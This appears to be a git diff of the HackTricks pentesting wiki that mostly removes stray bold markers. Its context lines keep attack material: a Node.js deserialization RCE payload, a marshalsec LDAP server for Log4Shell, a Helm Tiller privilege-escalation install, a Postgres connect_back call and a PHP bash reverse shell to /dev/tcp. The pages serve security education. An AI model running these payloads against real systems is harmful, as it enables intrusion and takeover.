****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png>)
|
||||
|
|
|
@ -11,8 +11,8 @@ If you want to **share some tricks with the community** you can also submit **pu
|
|||
### Preparation
|
||||
|
||||
* [ ] Read [**iOS Basics**](ios-pentesting/ios-basics.md)****
|
||||
* [ ] Prepare your environment reading **** [**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md)****
|
||||
* [ ] Read all the sections of **** [**iOS Initial Analysis**](ios-pentesting/#initial-analysis) **** to learn common actions to pentest an iOS application
|
||||
* [ ] Prepare your environment reading [**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md)****
|
||||
* [ ] Read all the sections of [**iOS Initial Analysis**](ios-pentesting/#initial-analysis) to learn common actions to pentest an iOS application
|
||||
|
||||
### Data Storage
|
||||
|
||||
|
|
|
@ -319,7 +319,7 @@ After this, the `Telegram.ipa` file will be created in your current directory. Y
|
|||
|
||||
#### flexdecrypt
|
||||
|
||||
In order to **obtain the ipa file** from an installed application you can also use the tool [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt) **** or a wrapper of the tool called **** [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac)**.**\
|
||||
In order to **obtain the ipa file** from an installed application you can also use the tool [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt) or a wrapper of the tool called [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac)**.**\
|
||||
****In any case you will need to **install flexdecrypt in the device** running something like:
|
||||
|
||||
```markup
|
||||
|
|
|
@ -10,7 +10,7 @@ WebViews are in-app browser components for displaying interactive **web** **cont
|
|||
* The **`JavaScriptCanOpenWindowsAutomatically`** can be used to **prevent** JavaScript from **opening new windows**, such as pop-ups.
|
||||
* The **`hasOnlySecureContent`** property can be used to verify resources loaded by the WebView are retrieved through encrypted connections.
|
||||
* `WKWebView` implements out-of-process rendering, so **memory corruption bugs won't affect** the main app process.
|
||||
* ****[**SFSafariViewController**](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller)**:** It **** should be used to provide a **generalized web viewing experience**. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements:
|
||||
* ****[**SFSafariViewController**](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller)**:** It should be used to provide a **generalized web viewing experience**. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements:
|
||||
|
||||
* A read-only address field with a security indicator.
|
||||
* An Action ("**Share**") **button**.
|
||||
|
|
|
@ -195,7 +195,7 @@ var test = '{"rce":"_$$ND_FUNC$$_require(\'child_process\').exec(\'ls /\', funct
|
|||
serialize.unserialize(test);
|
||||
```
|
||||
|
||||
You can **** [**find here**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **further information** about how to exploit this vulnerability.
|
||||
You can [**find here**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **further information** about how to exploit this vulnerability.
|
||||
|
||||
### [funcster](https://www.npmjs.com/package/funcster)
|
||||
|
||||
|
@ -297,8 +297,8 @@ find . -iname "*commons*collection*"
|
|||
grep -R InvokeTransformer .
|
||||
```
|
||||
|
||||
You could try to **check all the libraries** known to be vulnerable and that **** [**Ysoserial** ](https://github.com/frohoff/ysoserial)can provide an exploit for. Or you could check the libraries indicated on [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json).\
|
||||
You could also use **** [**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector) to search for possible gadget chains that can be exploited.\
|
||||
You could try to **check all the libraries** known to be vulnerable and that [**Ysoserial** ](https://github.com/frohoff/ysoserial)can provide an exploit for. Or you could check the libraries indicated on [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json).\
|
||||
You could also use [**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector) to search for possible gadget chains that can be exploited.\
|
||||
When running **gadgetinspector** (after building it) don't care about the tons of warnings/errors that it's going through and let it finish. It will write all the findings under _gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_. Please, notice that **gadgetinspector won't create an exploit and it may indicate false positives**.
|
||||
|
||||
#### Black Box Test
|
||||
|
@ -308,7 +308,7 @@ Using the Burp extension [**gadgetprobe**](java-dns-deserialization-and-gadgetpr
|
|||
****GadgetProbe is focused on ** `ObjectInputStream` ** deserializations**.**
|
||||
|
||||
Using Burp extension [**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) you can **identify vulnerable libraries** exploitable with ysoserial and **exploit** them.\
|
||||
[**Read this to learn more about Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) **** \
|
||||
[**Read this to learn more about Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) \
|
||||
****Java Deserialization Scanner is focused on **`ObjectInputStream`** deserializations.
|
||||
|
||||
You can also use [**Freddy**](https://github.com/nccgroup/freddy) to **detect deserializations** vulnerabilities in **Burp**. This plugin will detect **not only `ObjectInputStream`**related vulnerabilities but **also** vulns from **Json** an **Yml** deserialization libraries. In active mode, it will try to confirm them using sleep or DNS payloads.\
|
||||
|
@ -323,7 +323,7 @@ If you find a java serialized object being sent to a web application, **you can
|
|||
|
||||
#### **ysoserial**
|
||||
|
||||
The most well-known tool to exploit Java deserializations is **** [**ysoserial**](https://github.com/frohoff/ysoserial) ([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)). You can also consider using [**ysoseral-modified**](https://github.com/pimps/ysoserial-modified) which will allow you to use complex commands (with pipes for example).\
|
||||
The most well-known tool to exploit Java deserializations is [**ysoserial**](https://github.com/frohoff/ysoserial) ([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)). You can also consider using [**ysoseral-modified**](https://github.com/pimps/ysoserial-modified) which will allow you to use complex commands (with pipes for example).\
|
||||
****Note that this tool is **focused** on exploiting **`ObjectInputStream`**.\
|
||||
I would **start using the "URLDNS"** payload **before a RCE** payload to test if the injection is possible. Anyway, note that maybe the "URLDNS" payload is not working but other RCE payload is.
|
||||
|
||||
|
@ -657,7 +657,7 @@ Therefore the **`--test`** parameter allows us to understand **which chunks of c
|
|||
|
||||
### ViewState
|
||||
|
||||
Take a look to [this POST about **how to try to exploit the \_\_ViewState parameter of .Net** ](exploiting-\_\_viewstate-parameter.md)to **execute arbitrary code.** If you **already know the secrets** used by the victim machine, **** [**read this post to know to execute code**](exploiting-\_\_viewstate-knowing-the-secret.md)**.**
|
||||
Take a look to [this POST about **how to try to exploit the \_\_ViewState parameter of .Net** ](exploiting-\_\_viewstate-parameter.md)to **execute arbitrary code.** If you **already know the secrets** used by the victim machine, [**read this post to know to execute code**](exploiting-\_\_viewstate-knowing-the-secret.md)**.**
|
||||
|
||||
### **Prevention**
|
||||
|
||||
|
|
|
@ -52,7 +52,7 @@ namespace ODPCustomSerialExample
|
|||
}
|
||||
```
|
||||
|
||||
Note that you need to add as reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ **** in order to load `System.Windows.Data`
|
||||
Note that you need to add as reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ in order to load `System.Windows.Data`
|
||||
|
||||
## ExpandedWrapper
|
||||
|
||||
|
|
|
@ -147,7 +147,7 @@ You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) fro
|
|||
|
||||
**GadgetProbe** will use the same **DNS payload of the previous section** but **before** running the DNS query it will **try to deserialize an arbitrary class**. If the **arbitrary class exists**, the **DNS query** will be **sent** and GadgProbe will note that this class exist. If the **DNS** request is **never sent**, this means that the **arbitrary class wasn't deserialized** successfully so either it's not present or it''s **not serializable/exploitable**.
|
||||
|
||||
Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) **** with Java classes for being tested.
|
||||
Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) with Java classes for being tested.
|
||||
|
||||
![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)
|
||||
|
||||
|
|
|
@ -94,7 +94,7 @@ In [**LOG4J2-313**](https://issues.apache.org/jira/browse/LOG4J2-313) added a `j
|
|||
|
||||
With a **: present** in the key, as in `${jndi:ldap://example.com/a}` there’s **no prefix** and the **LDAP server is queried for the object**. And these Lookups can be used in both the configuration of Log4j as well as when lines are logged.
|
||||
|
||||
Therefore, the only thing needed to get RCE a **vulnerable version of Log4j processing information controlled by the user**. And because this is a library widely used by Java applications to log information (Internet facing applications included) it was very common to have log4j logging for example HTTP headers received like the User-Agent. **** However, log4j is **not used to log only HTTP information but any input** and data the developer indicated.
|
||||
Therefore, the only thing needed to get RCE a **vulnerable version of Log4j processing information controlled by the user**. And because this is a library widely used by Java applications to log information (Internet facing applications included) it was very common to have log4j logging for example HTTP headers received like the User-Agent. However, log4j is **not used to log only HTTP information but any input** and data the developer indicated.
|
||||
|
||||
## Log4Shell CVEs
|
||||
|
||||
|
@ -106,7 +106,7 @@ Therefore, the only thing needed to get RCE a **vulnerable version of Log4j proc
|
|||
\
|
||||
Threat intel analyst Florian Roth shared Sigma rules \[[1](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web\_cve\_2021\_44228\_log4j\_fields.yml), [2](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web\_cve\_2021\_44228\_log4j.yml)] that can be employed as one of the defenses.\
|
||||
 
|
||||
* [**CVE-2021-45046**](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) **** \[**Critical**, previously Low]: This one is a Denial of Service (DoS) flaw scoring a ~~3.7~~ 9.0. The flaw arose as a result of an **incomplete fix that went into 2.15.0** for CVE-2021-44228. While the fix applied to 2.15.0 did largely resolve the flaw, that wasn't quite the case for certain **non-default configurations**.\
|
||||
* [**CVE-2021-45046**](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) \[**Critical**, previously Low]: This one is a Denial of Service (DoS) flaw scoring a ~~3.7~~ 9.0. The flaw arose as a result of an **incomplete fix that went into 2.15.0** for CVE-2021-44228. While the fix applied to 2.15.0 did largely resolve the flaw, that wasn't quite the case for certain **non-default configurations**.\
|
||||
\
|
||||
Log4j 2.15.0 makes "a best-effort attempt" to **restrict JNDI LDAP lookups to **_**localhost**_ by default. But, **attackers** who have **control** over the **Thread Context Map (MDC)** input data can craft malicious payloads via the JNDI Lookup patterns to cause DoS attacsk. This applies to non-default configurations in which a non-default Pattern Layout using either a Context Lookup, e.g. \$${ctx:loginId}, or a Thread Context Map pattern (%X, %mdc, or %MDC).\
|
||||
\
|
||||
|
@ -233,7 +233,7 @@ For **more information** (_like limitations on RMI and CORBA vectors_) **check t
|
|||
|
||||
_This trick is entirely taken from the **THM box:**_ [_**https://tryhackme.com/room/solar**_](https://tryhackme.com/room/solar)_****_
|
||||
|
||||
For this exploit the tool [**marshalsec**](https://github.com/mbechler/marshalsec) (download a **** [**jar version from here**](https://github.com/RandomRobbieBF/marshalsec-jar)) will be used to create a LDAP referral server to direct connections to our secondary HTTP server were the exploit will be served:
|
||||
For this exploit the tool [**marshalsec**](https://github.com/mbechler/marshalsec) (download a [**jar version from here**](https://github.com/RandomRobbieBF/marshalsec-jar)) will be used to create a LDAP referral server to direct connections to our secondary HTTP server were the exploit will be served:
|
||||
|
||||
```bash
|
||||
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http:/<your_ip_http_server>:8000/#Exploit"
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
## Discovering using Automatic tools
|
||||
|
||||
The tools [**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0) and [**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap) **** can be used to **find prototype pollution vulnerabilities**. 
|
||||
The tools [**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0) and [**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap) can be used to **find prototype pollution vulnerabilities**. 
|
||||
|
||||
Moreover, you could also use the **browser extension** [**PPScan**](https://github.com/msrkp/PPScan) to **automatically** **scan** the **pages** you **access** for prototype pollution vulnerabilities.
|
||||
|
||||
|
|
|
@ -22,5 +22,5 @@ So where is the bug? **When upgrading a connection, the reverse proxy will often
|
|||
|
||||
The original blog post points out that not all servers will forward the required headers for a compliant H2C connection upgrade. This means load balancers like AWS ALB/CLB, NGINX, and Apache Traffic Server amongst others will **prevent a H2C connection by default**. However, at the end of the blog post, he does mention that “not all backends were compliant, and we could **test with the non-compliant `Connection: Upgrade` variant, where the `HTTP2-Settings` value is omitted** from the `Connection` header.”
|
||||
|
||||
Using the tools **** [**https://github.com/BishopFox/h2csmuggler**](https://github.com/BishopFox/h2csmuggler) **and** [**https://github.com/assetnote/h2csmuggler**](https://github.com/assetnote/h2csmuggler) **** you can try to **bypass the protections imposed** by the proxy establishing a H2C connection and access proxy protected resources.
|
||||
Using the tools [**https://github.com/BishopFox/h2csmuggler**](https://github.com/BishopFox/h2csmuggler) **and** [**https://github.com/assetnote/h2csmuggler**](https://github.com/assetnote/h2csmuggler) you can try to **bypass the protections imposed** by the proxy establishing a H2C connection and access proxy protected resources.
|
||||
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
|
||||
## **Quick Wins**
|
||||
|
||||
Run [**jwt\_tool**](https://github.com/ticarpi/jwt\_tool) **** with mode `All Tests!` and wait for green lines
|
||||
Run [**jwt\_tool**](https://github.com/ticarpi/jwt\_tool) with mode `All Tests!` and wait for green lines
|
||||
|
||||
```bash
|
||||
python3 jwt_tool.py -M at -t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" -rh "Authorization: Bearer eyJhbG...<JWT Token>"
|
||||
|
@ -139,7 +139,7 @@ openssl rsa -in keypair.pem -pubout -out publickey.crt
|
|||
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
|
||||
```
|
||||
|
||||
Then you can use for example [**jwt.io**](https://jwt.io) **** to create the new JWT with the **created public and private keys and pointing the parameter jku to the certificate created.** In order to create a valid jku certificate you can download the original one anche change the needed parameters.
|
||||
Then you can use for example [**jwt.io**](https://jwt.io) to create the new JWT with the **created public and private keys and pointing the parameter jku to the certificate created.** In order to create a valid jku certificate you can download the original one anche change the needed parameters.
|
||||
|
||||
You can obtain the parametes "e" and "n" from a public certificate using:
|
||||
|
||||
|
@ -165,7 +165,7 @@ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -out at
|
|||
openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem
|
||||
```
|
||||
|
||||
Then you can use for example [**jwt.io**](https://jwt.io) **** to create the new JWT with the **created public and private keys and pointing the parameter x5u to the certificate .crt created.**
|
||||
Then you can use for example [**jwt.io**](https://jwt.io) to create the new JWT with the **created public and private keys and pointing the parameter x5u to the certificate .crt created.**
|
||||
|
||||
![](<../.gitbook/assets/image (439).png>)
|
||||
|
||||
|
|
|
@ -9,7 +9,7 @@ If you find a login page, here you can find some techniques to try to bypass it:
|
|||
* Check to **not send the parameters** (do not send any or only 1)
|
||||
* Check the **PHP comparisons error:** _user\[]=a\&pwd=b_ , _user=a\&pwd\[]=b_ , _user\[]=a\&pwd\[]=b_
|
||||
* Check credentials:
|
||||
* [**Default credentials**](../../brute-force.md#default-credentials) **** of the technology/platform used
|
||||
* [**Default credentials**](../../brute-force.md#default-credentials) of the technology/platform used
|
||||
* **Common combinations** (root, admin, password, name of the tech, default user with one of these passwords).
|
||||
* Create a dictionary using **Cewl**, **add** the **default** username and password (if there is) and try to brute-force it using all the words as **usernames and password**
|
||||
* **Brute-force** using a bigger **dictionary (**[**Brute force**](../../brute-force.md#http-post-form)**)**
|
||||
|
|
|
@ -165,7 +165,7 @@ If you can get the **authorization code and use it with a different client then
|
|||
|
||||
### AWS Cognito <a href="#bda5" id="bda5"></a>
|
||||
|
||||
In this bug bounty report: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) **** you can see that the **token** that **AWS Cognito** gives back to the user might have **enough permissions to overwrite the user data**. Therefore, if you can **change the user email for a different user email**, you might be able to **take over** others accounts.
|
||||
In this bug bounty report: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) you can see that the **token** that **AWS Cognito** gives back to the user might have **enough permissions to overwrite the user data**. Therefore, if you can **change the user email for a different user email**, you might be able to **take over** others accounts.
|
||||
|
||||
```
|
||||
# Read info of the user
|
||||
|
@ -239,7 +239,7 @@ The following parameters are particularly interesting for SSRF attacks:
|
|||
|
||||
## OAuth providers Race Conditions
|
||||
|
||||
If the platform you are testing is an OAuth provider **** [**read this to test for possible Race Conditions**](race-condition.md).
|
||||
If the platform you are testing is an OAuth provider [**read this to test for possible Race Conditions**](race-condition.md).
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -66,7 +66,7 @@ Note in this case how the **first thing** that the code is doing is **checking t
|
|||
|
||||
In order to **find event listeners** in the current page you can:
|
||||
|
||||
* **Search** the JS code for **** `window.addEventListener` and `$(window).on` (_JQuery version_)
|
||||
* **Search** the JS code for `window.addEventListener` and `$(window).on` (_JQuery version_)
|
||||
* **Execute** in the developer tools console: `getEventListeners(window)`
|
||||
|
||||
![](<../.gitbook/assets/image (618) (1) (1).png>)
|
||||
|
|
|
@ -248,7 +248,7 @@ select connect_back('192.168.100.54', 1234);
|
|||
_Note that you don't need to append the `.dll` extension as the create function will add it._
|
||||
|
||||
For more information **read the**[ **original publication here**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\
|
||||
In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) **** (_to learn how to compile a postgres extension read any of the previous versions_).\
|
||||
In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_to learn how to compile a postgres extension read any of the previous versions_).\
|
||||
In the same page this **exploit to automate** this technique was given:
|
||||
|
||||
```python
|
||||
|
|
|
@ -183,7 +183,7 @@ Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30
|
|||
The last one is using 2 unicode characters which expands to 5: telsr\
|
||||
More of these characters can be found [here](https://www.unicode.org/charts/normalization/).\
|
||||
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).\
|
||||
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) **** and [**here**](https://tinyxss.terjanq.me).
|
||||
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
|
||||
|
||||
### Click XSS - Clickjacking
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
**If your input is being reflected inside a PDF file, you can try to inject PDF data to execute JavaScript or steal the PDF content.**
|
||||
|
||||
The following information was taken from **** [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)****
|
||||
The following information was taken from [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)****
|
||||
|
||||
### PDF-Lib
|
||||
|
||||
|
|
|
@ -17,7 +17,7 @@ Summing it all up:
|
|||
|
||||
1. Use Wireshark to **intercept** the **initial traffic** during **authorization**. This will be helped by ‘tns’ filter.
|
||||
2. Extract **HEX values for AUTH\_SESSKEY, AUTH\_VFR\_DATA**.
|
||||
3. Insert them into **** [**PoC script**](https://www.exploit-db.com/exploits/22069), which will perform a dictionary (brute force) attack.
|
||||
3. Insert them into [**PoC script**](https://www.exploit-db.com/exploits/22069), which will perform a dictionary (brute force) attack.
|
||||
|
||||
### Using nmap and john
|
||||
|
||||
|
|
|
@ -56,7 +56,7 @@ helm --host tiller-deploy.kube-system:44134 version
|
|||
|
||||
By default **Helm2** was installed in the **namespace kube-system** with **high privileges**, so if you find the service and has access to it, this could allow you to **escalate privileges**.
|
||||
|
||||
All you need to do is to install a package like this one: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) **** that will give the **default service token access to everything in the whole cluster.**
|
||||
All you need to do is to install a package like this one: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) that will give the **default service token access to everything in the whole cluster.**
|
||||
|
||||
```
|
||||
git clone https://github.com/Ruil1n/helm-tiller-pwn
|
||||
|
@ -64,4 +64,4 @@ helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-
|
|||
/pwnchart
|
||||
```
|
||||
|
||||
In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) you have the **explanation of the attack**, but basically, if you read the files [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) and **** [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) **** inside _helm-tiller-pwn/pwnchart/templates/_ you can see how **all the privileges are being given to the default token**.
|
||||
In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) you have the **explanation of the attack**, but basically, if you read the files [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) and [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) inside _helm-tiller-pwn/pwnchart/templates/_ you can see how **all the privileges are being given to the default token**.
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
|
||||
**TFTP** uses UDP port 69 and **requires no authentication**—clients read from, and write to servers using the datagram format outlined in RFC 1350. Due to deficiencies within the protocol (namely lack of authentication and no transport security), it is uncommon to find servers on the public Internet. Within large internal networks, however, TFTP is used to serve configuration files and ROM images to VoIP handsets and other devices.
|
||||
|
||||
**TODO**: Provide information about what is a Bittorrent-tracker (Shodan identifies this port with that name). PLEASE, LET ME KNOW IF YOU HAVE SOME INFORMATION ABOUT THIS IN THE [**HackTricks telegram group**](https://t.me/peass) **** (or in a github issue in [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
|
||||
**TODO**: Provide information about what is a Bittorrent-tracker (Shodan identifies this port with that name). PLEASE, LET ME KNOW IF YOU HAVE SOME INFORMATION ABOUT THIS IN THE [**HackTricks telegram group**](https://t.me/peass) (or in a github issue in [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
|
||||
|
||||
**Default Port:** 69/UDP
|
||||
|
||||
|
|
|
@ -43,7 +43,7 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"
|
|||
{"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401}
|
||||
```
|
||||
|
||||
That will means that authentication is configured an **you need valid credentials** to obtain any info from elasticserach. Then, you can [**try to bruteforce it**](../brute-force.md#elasticsearch) **** (it uses HTTP basic auth, so anything that BF HTTP basic auth can be used).\
|
||||
That will means that authentication is configured an **you need valid credentials** to obtain any info from elasticserach. Then, you can [**try to bruteforce it**](../brute-force.md#elasticsearch) (it uses HTTP basic auth, so anything that BF HTTP basic auth can be used).\
|
||||
Here you have a **list default usernames**: _**elastic** (superuser), remote\_monitoring\_user, beats\_system, logstash\_system, kibana, kibana\_system, apm\_system,_ \_anonymous_._ Older versions of Elasticsearch have the default password **changeme** for this user
|
||||
|
||||
```
|
||||
|
|
|
@ -281,7 +281,7 @@ kubectl port-forward pod/mypod 5000:5000
|
|||
|
||||
### **Impersonating privileged accounts**
|
||||
|
||||
With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) **** privilege, an attacker could impersonate a privileged account.
|
||||
With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) privilege, an attacker could impersonate a privileged account.
|
||||
|
||||
In this example, the service account _**sa-imper**_ has a binding to a ClusterRole with rules that allow it to impersonate groups and users.
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ You can choose to:
|
|||
|
||||
### Kubeaudit
|
||||
|
||||
The tool [**kubeaudit**](https://github.com/Shopify/kubeaudit) **** is a command line tool and a Go package to **audit Kubernetes clusters** for various different security concerns.
|
||||
The tool [**kubeaudit**](https://github.com/Shopify/kubeaudit) is a command line tool and a Go package to **audit Kubernetes clusters** for various different security concerns.
|
||||
|
||||
Kubeaudit can detect if it is running within a container in a cluster. If so, it will try to audit all Kubernetes resources in that cluster:
|
||||
|
||||
|
|
|
@ -18,7 +18,7 @@ The difference between “**Roles**” and “**ClusterRoles**” is just where
|
|||
* **non-resource** endpoints (like /healthz).
|
||||
* namespaced resources (like Pods), **across all namespaces**.
|
||||
|
||||
From **Kubernetes** 1.6 onwards, **RBAC** policies are **enabled by default**. **** But to enable RBAC you can use something like:
|
||||
From **Kubernetes** 1.6 onwards, **RBAC** policies are **enabled by default**. But to enable RBAC you can use something like:
|
||||
|
||||
```
|
||||
kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Pentesting Network
|
||||
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
|
||||
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks\*\*]\(https://github.com/carlospolop/hacktricks) **that will be reflected in this book.**\
|
||||
**Don't forget to** give ⭐ on the github to motivate me to continue developing this book.
|
||||
|
||||
|
|
|
@ -85,7 +85,7 @@ site:ipv6./
|
|||
|
||||
### DNS
|
||||
|
||||
You could also try to search "**AXFR**"(zone transfer), "**AAAA**"(IPv6) or even "**ANY**" (all) registry in DNS **** to find IPv6 addresses.
|
||||
You could also try to search "**AXFR**"(zone transfer), "**AAAA**"(IPv6) or even "**ANY**" (all) registry in DNS to find IPv6 addresses.
|
||||
|
||||
### Ping6
|
||||
|
||||
|
|
|
@ -33,7 +33,7 @@ The Printer Job Language (PJL) was originally introduced by HP but soon became a
|
|||
@PJL ENTER LANGUAGE=POSTSCRIPT
|
||||
```
|
||||
|
||||
Inside the **** [**page about port 9100 'raw port'**](../9100-pjl.md) **** you can find more information about **how to enumerate PJL**.
|
||||
Inside the [**page about port 9100 'raw port'**](../9100-pjl.md) you can find more information about **how to enumerate PJL**.
|
||||
|
||||
### PML
|
||||
|
||||
|
|
|
@ -56,4 +56,4 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
|
|||
|
||||
### SQLi in Flask session cookie with SQLmap
|
||||
|
||||
[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) **** uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
|
||||
[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
|
||||
|
|
|
@ -30,7 +30,7 @@ PHP comparison tables: [https://www.php.net/manual/en/types.comparisons.php](htt
|
|||
|
||||
{% file src="../../../.gitbook/assets/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf" %}
|
||||
|
||||
* `"string" == 0 -> True` **** A string which doesn't start with a number is equals to a number
|
||||
* `"string" == 0 -> True` A string which doesn't start with a number is equals to a number
|
||||
* `"0xAAAA" == "43690" -> True` Strings composed by numbers in dec or hex format can be compare to other numbers/strings with True as result if the numbers were the same (numbers in a string are interpreted as numbers)
|
||||
* `"0e3264578" == 0 --> True` A string starting with "0e" and followed by anything will be equals to 0
|
||||
* `"0X3264578" == 0X --> True` A string starting with "0" and followed by any letter (X can be any letter) and followed by anything will be equals to 0
|
||||
|
|
|
@ -58,7 +58,7 @@ proc_close(proc_open("uname -a",array(),$something));
|
|||
pcntl_exec("/bin/bash", ["-c", "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"]);
|
||||
```
|
||||
|
||||
